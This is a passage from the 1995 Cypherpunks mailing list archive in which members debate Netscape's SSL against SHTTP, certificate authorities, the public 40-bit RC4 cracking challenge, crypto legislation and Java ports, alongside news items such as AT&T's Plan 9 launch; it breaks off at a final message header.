> Had problems with the original transmission...
> 
> 21:22 EST
> July 17th, 1995
> New Haven, CT
> 
> Day One, Investigation Begins.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 20 Jul 95 00:48:00 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac330625030210040787@[205.199.118.202]>
Message-ID: <9507200747.AA15208@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Integration of crypto into Netscape is thus the Big Win.

Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
-- a complete waste of time.

Among other things, SSL only lets you authenticate to X.509
certificate roots that have been issued straight from the hands of Jim
Bidzos -- which effectively means that you can secure only connections
with Netscape commerce servers, and that you cannot authenticate both
ends of the communications link. Its also just plain bad -- there are
ugly holes in the security from what I can see. Netscape is, of
course, pushing it as a standard. Vomit.

Luckily, Netscape recently hired Tahir El Gammal (did I put too many
m's there?) and he's a smart guy. Unfortunately, he seems to be in a
position where he has to defend the fairly bad work they did already.

Other web security systems are also on their way out, of course. Our
own Eric Rescorla (who lurks most of the time) is the author of the
SHTTP specification.

> The relevance for Cypherpunks interested in writing code is that, in my
> carefully considered opinion, writing for Netscape and other Web browsers
> is the Big Win. Even over Windows (except Windows browsers, of course).

Netscape is a closed system. You can't write code for it unless you
work for Netscape.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 20 Jul 95 01:27:15 PDT
To: cypherpunks@toad.com
Subject: Name misspelling
Message-ID: <9507200827.AA14586@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been informed that the proper spelling was Taher Elgamal.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an253398@anon.penet.fi (Mole Rat)
Date: Wed, 19 Jul 95 23:27:57 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507200542.AA23518@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:
 > Hell, at this point, my guess is that the mafia(s) doesn't use crypto, or 
 > that if it does, it can be caught via other means.  A strong, well 
 > developed crypto system in use by the mafia would more than likely never 
 > happen... not until mobsters get into computers.  Ditto for terrorists.

     Sounds like an untapped market segment.  In which periodicals
     should one advertise consulting services in order to cover the
     mobster market?

     Seriously, I imagine that organized crime, like any other
     business, uses computers.  Their level of crypto usage could be
     impressive, given the incentives.

 > If they did use crypto, I suspect they wouldn't get caught.  (For the 
 > paranoid, assuming they used crypto, and they didn't get caught, then the 
 > FBI or other TLA is doing the same as the gov't in Farenheight 451... 
 > pick someone else, and jail them.  Otherwise, how do you explain all the 
 > jailbird mobsters?)

     "There is no honor among thieves."  Wiretaps, bugs, tails,
     informants, and good, old-fashioned, physical intimidation
     probably produce plenty of leads.

     I wasn't entirely facetious above about working for the mob,
     they probably pay well and don't bother with FICA and such.  Plus
     there's that "family" atmosphere....
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Godwin <mnemonic@eff.org>
Date: Thu, 20 Jul 95 04:44:58 PDT
To: shabbir@panix.com
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507192226.SAA10293@panix4.panix.com>
Message-ID: <199507201143.HAA26318@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


 
Shabbir writes:

> S 974 is a silly bill.  It's like someone went around and made a list
> of all the things that would irk us and then wrote legislation
> around it.
> 
> However this bill isn't immediately going anywhere, and there's more
> dangerous legislation on the floor that is looking a lot like a loaded
> gun.
> 
> VTW is tracking this bill and will put out alerts on it if it becomes
> a more valid threat.  However until then we'll not try to divide the
> forces of the net on bills that aren't yet a serious threat.
> 
> Read the bill, familiarize yourself with the analyses, but let's not
> go running off every time some DC bozo writes a terrible bill.  Especially
> when there isn't even a subcommittee hearing scheduled yet.
> 
> Let's try and do *one thing* at a time.
 
I just want to say: I endorse everything Shabbir says here. 


--Mike







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Otto <dave@dvorak.jta.edd.ca.gov>
Date: Thu, 20 Jul 95 07:48:46 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Netscape the Big Win
In-Reply-To: <v02120d2cac338abe35db@[199.2.22.120]>
Message-ID: <199507201449.HAA02245@dvorak.jta.edd.ca.gov>
MIME-Version: 1.0
Content-Type: text/plain


on Wed, 19 Jul 1995 20:24:31 -0800  Douglas Barnes wrote:
> available on Suns running Solaris 2.4 and PCs running Windows NT.
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Are there any plans to port JAVA to a REAL operating system?  Support
for crypto needs to be ubiquitous to work.  Start with the fanatics
(Linux and FreeBSD) and the other platforms will quickly follow (often
ported by the afore mentioned fanatics so that the departmental server
can run the same code as their desktop box :-).

                Dave Otto - Vinimus, Vedimus, Dolivamus
    http://ACM.org/~daveotto/   http://ACM.org/~daveotto/linux.html/
              dave@dvorak.jta.edd.ca.gov daveotto@acm.org
  "Pay no attention to the man behind the curtain!"     [the Great Oz]
     finger DaveOtto@ACM.org/or server for PGP 2.6 key  <0x3300e841>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 20 Jul 95 07:54:57 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507200747.AA15208@snark.imsi.com>
Message-ID: <199507201453.HAA19510@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

>Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
>-- a complete waste of time.

>Among other things, SSL only lets you authenticate to X.509
>certificate roots that have been issued straight from the hands of Jim
>Bidzos -- which effectively means that you can secure only connections
>with Netscape commerce servers, and that you cannot authenticate both
>ends of the communications link. Its also just plain bad -- there are
>ugly holes in the security from what I can see. Netscape is, of
>course, pushing it as a standard. Vomit.

Unfortunately the main alternative to SSL being pushed now, SHTTP, also
suffers from RSA-itis.  It will support either PEM or PKCS-7 key
certificates, so I think ends up being pretty much the same as SSL in
this regard.

Note though that neither SSL or SHTTP requires that the certificates come
from RSA.  However the current versions of Netscape's browser do require this.
This has been the source of much complaint and Netscape has promised that
they will have some mechanism in the future to allow the user to
choose his certificate signers.  I am not sure how far RSA will let them
off the leash, though.

The current version of SSL supports client authentication (via X.500
certificates of course).

rsalz@osf.org writes re SSL:

>I think it
>was Perry, for example, that pointed out that using one RC4 stream for
>each comm half was more-or-less obvious and standard practice.

I'm not sure what this is getting at.  SSL does use a separate RC4 stream
for each comm half.  Is this a suggestion that a single key should be
used for both directions?  There are two ways that could be done: keep
separate state info for each direction, in which case you are encrypting
data twice with the same pseudo-random string, a definite no-no; or try
to keep a single global state for the cipher, but this is impossible due
to the (potentially) asynchronous nature of the communications.

Back to Perry:

>Netscape is a closed system. You can't write code for it unless you
>work for Netscape.

That is why I am working on the proxy approach.  Any browser should be
able to use enhancements supplied in this way.  Netscape is the big name
this year, who knows who it will be next year.  As long as IP
connectivity is available a proxy can get into the stream and apply
enhancements.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 20 Jul 95 05:53:40 PDT
To: cypherpunks@toad.com
Subject: Re: (Cracking) Netscape (is) the Big Win
Message-ID: <9507201253.AA18741@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Timothy C. May writes:
> > Integration of crypto into Netscape is thus the Big Win.
> Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
> -- a complete waste of time.
>[snip] 
> Perry

This is why it's imperative for cpunks to work on the SSL challenge
recently posted. Cracking 40 bit RC4 will provide a strong industry
incentive to move towards stronger crypto standards, and to pressure
the government to relax ITAR. 

If the SSL crack looks like it will take a while to gear up, perhaps
we should work on an interim project, cracking a straight 40bit rc4
encrypted message. If there is interest, I can create such a text, and 
escrow the key and plaintext in a PGP-encoded posting. 

While such a crack will not be as strong a blow against SSL and 
40-bit crypto as cracking a complete SSL transaction, it will be
a lot better then only being able to say 'Well, we didn't find a
key, but we *did* sweep 40 bits of keyspace', which is all we have
now. If need be, we can follow up with a crack of full-bore SSL.

Disclaimer: I work on a competing product, but am posting this in 
my private capacity. We've bigger fish to fry than Netscape.

Peter Trei
ptrei@acm.org

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 20 Jul 95 09:06:04 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD81C0.00030001D9.uuout@famend.com>
Message-ID: <8AD9224.00030001F5.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PE> > PE> would be discerned by a staffer in moments. Crap like this is called
PE> >
PE> >   They should know, because they send form letters to constituents all
PE> > the time, only they don't bother to vary it a bit.
PE>
PE> Misdirection. This has nothing to do with my point. The staffers will
PE> STILL toss your stuff.

  After putting the appropriate tally mark on the sheet for the day's
mail, and sending out the response letter, yep. I don't expect Jan Meyers
to personally =ever= see my mail to her office. I only expect her
gruntlings to put that mark under "no" for the ______ Bill.

PE> >   Meanwhile, back at the ranch.
PE>
PE> In other words, you are choosing to ignore me. Regardless of whether

  Not at all. I concede that letters do not get read by Anyone
Important. I only want them to =count= the darned things, and the
variations in verbiage, margins, fonts, etc. should be enough to get
them classified as part of an organized letter-writing campaign, instead
of a form-letter-signing campaign. That puts the mark in a different
column.

PE> you are paying attentoion, however, you will still not be able to

  Not only am I paying attentoion [sic], but I know from experience that
the staffers at least have to pay enough themselves to know which form
letter to send me in response to my Heartfelt Expressions of Concern.
Without fail, I get that letter from Meyers' office, but only about half
the time from Dole or Kassebaum.

PE> > .. If one of our DC members can set up an
PE> > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
PE>
PE> Perhaps people who can be bothered to spell out "folks" properly also

  When I am writing to people whose opinion of my spelling I give a snit
about, I will spell it precisely as you indicate. If it annoys you, set
up your copy of exxxon to do the transform, or put my name in your twit
filter.  Talk about misdirection....

  But "folx" is exactly the kind of thing that tells the staffer that it
is =not= a form letter, because a computer would not be programmed to
use variant spellings, would it?


PE> are willing to write letters that will be paid attention to. As you
PE> seem to prefer to ignore the fact that you will be ignored, why are
PE> you willing to spend effort setting up an "Imail[sic]-FAX gateway"?

  Because that gateway can be used to convert genuinely original,
pseudo-original, or blatantly copied Internet mail,
                                     ^        ^^^^
       May God have mercy on my soul for having coined an =original=
     abbrv'n. rather than merely rearranging the words and phrases that
     others frequently use, which would, of course, be Astroturf<tm>. I
     have never seen the Houston Oilers play football on faxes
     before....

which has no, or virtually no, marginal cost to most net.people, into
actual paper, which, being tangible, has the potential to be counted as
Natural Grass, and thus not contribute to knee injuries.




 * Abuse of power comes as no surprise.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 20 Jul 95 06:52:29 PDT
To: cypherpunks@toad.com
Subject: BUS_gut
Message-ID: <199507201352.JAA04327@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-20-95. NYPaper:


   "Clinton Assails Officers' Racist Event. Gathering Is
   Defended by the Organizer as Get-Acquainted Party."

      Mr. Rightmyer, organizer of the event, said he believed
      the criticism of the roundups was part of a politically
      motivated "setup" by the paramilitary group, the Gadsden
      Minutemen, who harbor intense hostility toward the ATF
      for its role in regulating the manufacture and sale of
      guns. Morris Dees, head of a prominent civil-rights
      organization, supported his view, and one Federal
      law-enforcement official said Mr. Rightmyer might be
      correct.                                       JIV_tun


   "Montana Tax Protester Is Shot During a Raid."

      Local law-enforcement authorities, who had waited for
      more than three years to arrest a tax protester, Gordon
      Sellner, accused of trying to kill a lawman, shot and
      wounded him in a raid on his home.             JAK_but


   [OpEd] "Terror In Montana: Judges do their jobs and risk
   their lives." 

      Martha A. Bethel has been a municipal judge in Montana
      for nine years. This article is adapted from a statement
      she made last week at a Congressional forum on the
      militia movement.                              JUG_hug



   Trio: BUS_gut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 20 Jul 95 07:02:13 PDT
To: cypherpunks@toad.com
Subject: IITF Report
Message-ID: <9507201400.AA03724@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



The Information Infrastructure Task Force (IITF) National Information 
Infrastructure Security Issues Forum draft report can be found at:

http://ntiaunix1.ntia.doc.gov:70/0/iitf/security/fedrole.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 10:05:30 PDT
To: cypherpunks@toad.com
Subject: S/MIME and the Future of Netscape
Message-ID: <ac33d9e705021004c7d6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



With regard to SSL and Netscape not being open to outside developers,
several leading e-mail outfits, including Qualcomm, Netscape, Frontier,
etc., are working on an interoperable secure e-mail standard called
"Secure/MIME," or "S/MIME."

And even if Netscape will not allow outside developers--like J. Random
Cypherpunk--access to the code internals and incorporaton of his work into
Netscape's final compiled code, not surprisingly, there are still numerous
options for hooking in. Hal Finney described some ideas, and I'm sure more
exist.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 20 Jul 95 07:15:54 PDT
To: tcmay@sensemedia.net
Subject: Re: Netscape the Big Win
Message-ID: <9507201415.AA23275@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Luckily, Netscape recently hired Taher Elgamal
> and he's a smart guy. Unfortunately, he seems to be in a
> position where he has to defend the fairly bad work they did already.

When I first saw him speak at the Danvers IETF I thought "gee, does this
bozo know he shares the same last name as a real bright guy"?  I think it
was Perry, for example, that pointed out that using one RC4 stream for
each comm half was more-or-less obvious and standard practice.

At last month's World Wide Web Consortium working group meeting on security,
everyone trashed SSL.  Everyone trashed the W3C for not just picking SHTTP
but instead trying to invent something new that "borrowed from" SHTTP.
Tahir was silent on the former, but didn't disagree on the latter.  During
a break, in the hallway he mentioned how he's gonna have to do some
politicking back at the office, and that he's glad someone reasonable like
him came, and not other folks he could name.

> Netscape is a closed system. You can't write code for it unless you
> work for Netscape.

I thought they announced their intent to support java.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 20 Jul 95 10:23:43 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507201722.KAA10382@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Adam Shostack <adam@bwh.harvard.edu>
> 	Actually, it also supports Kerberos (not relevant to most of
> us), and PGP messaging.  Although a KCA would be needed before anything
> useful came of the PGP support, at least its there.

It appears that support for PGP messaging has been removed from the
July 1995 SHTTP draft.  So it's X.500 all the way.
<URL:http://info.internet.isi.edu/in-drafts/files/draft-ietf-wts-shttp-00.txt>


From: Steven Champeon - Imonics Development <schampeo@imonics.com>
> The one "advantage" to SSL that they were pushing over SHTTP was that
> SSL is a socket-level encryption mechanism, as opposed to protocol-
> level. It doesn't conflict with SHTTP except in terms of adding to
> the processing time.
> 
> I guess I don't see why SSL is so awful from a crypto standpoint.
> Could someone a bit more educated on the nuts and bolts clue me
> in on its weaknesses? As compared to other schemes, perhaps?

Frankly I don't think SSL is particularly weak cryptographically.  It has
gone through several revisions as various problems were pointed out.

The one thing I would note is that there is considerable known plaintext
being exchanged in the handshake.  This helps with key guessing and will
be the foundation for the SSL challenge that Adam Back is organising.
IMO at least some of this material could have been sent encrypted with
the public key so that an eavesdropper couldn't know it.  OTOH this
might have run afoul of the NSA's rules on export for at least the 40 bit
version since you'd have more than 40 bits of secrecy in effect.

SSL includes a 16 byte checksum with each packet.  IMO this is overkill
and wasteful for small packets.  One thing about SSL is that it
provides both secrecy and immunity to certain kinds of active attacks.
These big checksums include a sequence number and key information to
prevent replay attacks.  For some purposes you might be satisfied with
secrecy and not want to pay this overhead.

I think a lot of the criticism of SSL was based on the thought that it
would be obsoleted by the new IP secure protocols.  That may be true
eventually but SSL is here today, in use.  Order something from
Netscape and it is secured with SSL.  Buy the domestic version if you
want real security.  For IP, many of us we will have to wait until
the new IP protocols get built into our OS's and other infrastructure.

People have also objected to the use of the X.500 certificate approach.
But that seems to be de rigeur for any serious Internet standard these
days.  IMO the real solution is to come up with a PGP-like X.500
certificate maker so people can easily set themselves up as Certificate
Authorities and go about their business while the anal hierarchy
fans argue about liability.  Actually I think there is a PD certificate
maker around, possibily from Eric Young down under.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 10:32:13 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <ac33dc68060210045e75@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:18 PM 7/20/95, Pat Farrell wrote:

>The current trend is to bundle all types of functionality into huge
>monolithic programs. Add mail to netscape, add encryption, add ...
>
>Yet most of the computers people use are multi-windows, and soon most
>will even be multi-tasking.
>
>Why are all-in-one programs so preferable to using the windowing
>capabilities that are built into every X-window, Mac or Windows system?
>
>Why not use the best mail client, another best webcrawler, and yet another
>news reader?

Speaking for myself, consistency of user interface.

To that extent, Netscape (or Lotus Notes, in a different context) becomes
the "operating environment" for the user, the place where he does his work.


The News reader in Netscape 1.1N is as good as the main "separate" news
reader, NewsWatcher, for the Macintosh, and has some added benefits. For
example, URLs in News postings automatically show up as clickable items,
which can be jumped to immediately. (Other News programs _could_ do this,
and maybe some of them do, but not on the Macintosh, at this moment.)


>Microsoft has been preaching the use of OLE and component programs as its
>development vision for 2+ years, Macs have been popular for ten years,
>why is the trend still towards adding every possible bell and whistle
>to single programs?

I don't know why "componentware" has not taken off. But it hasn't. OpenDoc
and OLE 2 are coming, but slowly.

Big programs tend to grow because they can increase market share by adding
capabilities, by pulling in more customers. We might prefer a world of
smaller apps, with componentware pieces, but it rarely happens.

And I'm not going to use half a dozen small programs, each doing slightly
different things and having different commands, when one will do nicely.

(I could list other pluses and minuses, a la my outline FAQ, but here's
just one more important item: cross-compatibility. Namely, with N smaller
programs in use, of varying versions, incompatibilities and even crashes
can result all too often ("We have discovered that MailMuncher 2.12 does
not work with NewsNabber 1.1."). At lest with something like Netscape, a
certain amound of cross-operability is likely, for various reasons.)

In any case, while I respect the views Pat is expressing, about
componentware and "small is better" approaches, the market is voting with
its feet for apps like Netscape, which are becoming the main programs folks
will use for communication, News reading, and Web surfing.

>With components, it wouldn't be hard to have a universal
>Encryption/Signature module. It would get arround any propriatary
>restriction that vendors may or may not try to enforce ("can Netscape be
>extended or not" becomes moot).

So go ahead and do it! I've been waiting for many years for such things.

To state an obvious non-crypto use of such "modules," why do all major word
processing and page layout apps have their own "dictionaries"? Why do I
have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
there have not been "dictionary modules," for many and sundry reasons, is
telling. (Before anyone mentions it, one can on the Mac use things like
"Thunder" instead of the local dictionaries...this is not the same as a
module usable by all programs, but instead is a user choice to bypass the
local dictionaries. We could quibble for hours about whether this is in
fact a universal module or not.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 20 Jul 95 09:13:30 PDT
To: dave@dvorak.jta.edd.ca.gov
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201449.HAA02245@dvorak.jta.edd.ca.gov>
Message-ID: <doug-9506201613.AA002518293@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>on Wed, 19 Jul 1995 20:24:31 -0800  Douglas Barnes wrote:
>> available on Suns running Solaris 2.4 and PCs running Windows NT.
>               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Are there any plans to port JAVA to a REAL operating system?  Support
>for crypto needs to be ubiquitous to work.  Start with the fanatics
>(Linux and FreeBSD) and the other platforms will quickly follow (often
>ported by the afore mentioned fanatics so that the departmental server
>can run the same code as their desktop box :-).
>
>                Dave Otto - Vinimus, Vedimus, Dolivamus
>    http://ACM.org/~daveotto/   http://ACM.org/~daveotto/linux.html/
>              dave@dvorak.jta.edd.ca.gov daveotto@acm.org
>  "Pay no attention to the man behind the curtain!"     [the Great Oz]
>     finger DaveOtto@ACM.org/or server for PGP 2.6 key  <0x3300e841>
>
>
>
There are java ports in progress for several OS's. Linux is among them
and there is a special mailing list for the linx port of java. Check the
sun home page for porting information, mailing lists, and new developments.

By the way, the current version of Java is Alpha2 release. Expect interface
and programmatic changes before a real version comes out January time frame.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 20 Jul 95 08:17:22 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507201516.AA23453@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> I'm not sure what this is getting at.  SSL does use a separate RC4 stream
> for each comm half.  Is this a suggestion that a single key should be
> used for both directions?

No.  They were saying "look, we use two keys."  And Perry went "duh."
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 20 Jul 95 08:18:57 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <40697.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  tcmay@sensemedia.net (Timothy C. May)  writes:

> * I use Netscape to read News.
> * I use Netscape to access the Web.
> * I still use Eudora to send and receive Mail. (Netscape can currently
> send mail, but not receive it. This is likely to change soon.)

I'm not about to argue that the web isn't the hotest thing on the net,
which is the hotest thing in computing... But I've got a question
that I can't resolve.

The current trend is to bundle all types of functionality into huge
monolithic programs. Add mail to netscape, add encryption, add ...

Yet most of the computers people use are multi-windows, and soon most
will even be multi-tasking.

Why are all-in-one programs so preferable to using the windowing
capabilities that are built into every X-window, Mac or Windows system?

Why not use the best mail client, another best webcrawler, and yet another
news reader?

Microsoft has been preaching the use of OLE and component programs as its
development vision for 2+ years, Macs have been popular for ten years,
why is the trend still towards adding every possible bell and whistle
to single programs?

With components, it wouldn't be hard to have a universal
Encryption/Signature module. It would get arround any propriatary
restriction that vendors may or may not try to enforce ("can Netscape be
extended or not" becomes moot).

Is clicking on another icon really too hard?

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 20 Jul 95 08:30:51 PDT
To: cypherpunks@toad.com
Subject: P.S. re: IITF Report
Message-ID: <9507201521.AA11198@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I am told by my local net expert that it should have been:

	http://ntiaunix1.ntia.doc.gov:70/iitf/security/fedrole.txt

(but the URL I sent before worked for me).

The report is dated June 14 -- but I don't remember seeing any discussion
of it on the list.  IMHO, it's very good -- gives passing mention of
Clipper but doesn't push GAK.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Thu, 20 Jul 95 08:23:11 PDT
To: hfinney@shell.portal.com
Subject: Re: Netscape the Big Win
Message-ID: <9507201522.AA14900@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From: Hal <hfinney@shell.portal.com>
|   Subject: Re: Netscape the Big Win
|
|   [ much complaining by .pm deleted ]
|   
|   Note though that neither SSL or SHTTP requires that the certificates come
|   from RSA.  However the current versions of Netscape's browser do require this.
|   This has been the source of much complaint and Netscape has promised that
|   they will have some mechanism in the future to allow the user to
|   choose his certificate signers.  I am not sure how far RSA will let them
|   off the leash, though.

I do know that at the Netscape Spring Training I attended, that was the
source of much consternation from the techies (who knew what it meant)
and Mr. ElGemal was certainly aware of it. The thing that scared me was
that most of the sales and marketing folks took the approach that I think
we can expect from them: "What! That's ridiculous! Oh, it's only $230?
Oh, okay. That's cheap enough." and then they went on their happy way.

The one "advantage" to SSL that they were pushing over SHTTP was that
SSL is a socket-level encryption mechanism, as opposed to protocol-
level. It doesn't conflict with SHTTP except in terms of adding to
the processing time.

I guess I don't see why SSL is so awful from a crypto standpoint.
Could someone a bit more educated on the nuts and bolts clue me
in on its weaknesses? As compared to other schemes, perhaps?

Thanks in advance,

Steve Champeon
Technical Lead, Web Services
Imonics Corporation 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Thu, 20 Jul 95 09:35:19 PDT
To: cypherpunks@toad.com
Subject: Plan 9 OS  (NewsClip)
Message-ID: <199507201635.LAA24498@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




AT&T Launches Plan 9 Operating System


Murray Hill, NJ, July 19 -- AT&T has announced a new
distributed operating system, called Plan 9. The new system
was developed by some of the same people who created the Unix
operating system, and the terms on which AT&T is making it
available are reminiscent of Unix, but the company stressed
that Plan 9 is not Unix.

Named for the cult science fiction movie Plan 9 From Outer
Space, the Plan 9 operating system is designed to work well on
networked computers. It has components for "terminals," or
desktop systems, for file servers, and for central processing
unit (CPU) servers.

Plan 9 is designed to deal with multiprocessing systems as CPU
servers. It supports four major hardware architectures: Intel
Corp.'s x86 line (including the Pentium chip), MIPS Computer
Systems Inc. processors, Sun Microsystems Inc. SPARC chips,
and Motorola Inc.'s 68020 and 68040 processors.

During simultaneous press conferences in Murray Hill and San
Francisco, connected by a teleconference link, Rob Pike, one
of the Plan 9 developers, said the new system is meant to
combine some of the advantages of Unix with some of those of
low-cost hardware. "We basically started by noticing some
things that we liked and didn't like about Unix and liked and
didn't like about workstations," Pike said.

Pike stressed that while Plan 9 borrows some ideas from Unix,
it is quite different and is not compatible with Unix. He went
on to say that AT&T does not expect Plan 9 to compete with
major commercial operating systems such as Unix and Microsoft
Corp.'s Windows NT. "This is not the next Unix," Pike said.

It appears in fact that the most promising commercial market
for Plan 9 might be in embedded systems. During the press
conference, AT&T researchers and officials repeatedly
mentioned the possibility that Plan 9 might be built into
consumer devices and other intelligent electronic devices, an
area where no standard operating system predominates today.

AT&T plans to make Plan 9 available for commercial licensing
to other vendors for an initial fee of $200,000, plus per-copy
fees that will amount to 20 percent of the resale price of
commercial software or two percent of the selling price of
hardware with Plan 9 built in, said Paul Fillinich, marketing
manager for AT&T's Software Solutions operation.

Single copies of Plan 9 will also be available for research
and educational use, but Fillinich stressed that the company
will not provide technical support. "We will replace the media
should it fail," he said. For commercial licensees there may
be some sort of support in the future. "We are contemplating
this," Fillinich said. "However, we haven't decided what the
offering will be."

Publisher Harcourt Brace & Co. will distribute Plan 9 for
AT&T. The full package, including a CD-ROM, four diskettes,
and two manuals, will cost $350. The manuals are available on
their own for $125.

Apparently wishing to avoid a repeat of the way Unix
splintered into many different versions, AT&T is specifying
that while source code for Plan 9 will be made available to
research and educational users, any changes they make will
become AT&T's property so that they can be incorporated in the
base code. "We want only one Plan 9," Fillinich said. "We
think the industry wants only one Plan 9."

The minimum hardware needed to run Plan 9 is an Intel 386
processor with eight megabytes (MB) of memory and 40MB of
available hard disk space, said Phil Winterbottom, another of
the Plan 9 developers. An optimal arrangement would include a
dedicated file server and multiple desktop terminals, he
added.

Further information about Plan 9 is available on AT&T's
Plan 9 home page on the World Wide Web, at
http://plan9.att.com/plan9/index.html.

--







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 20 Jul 95 08:56:27 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Netscape the Big Win
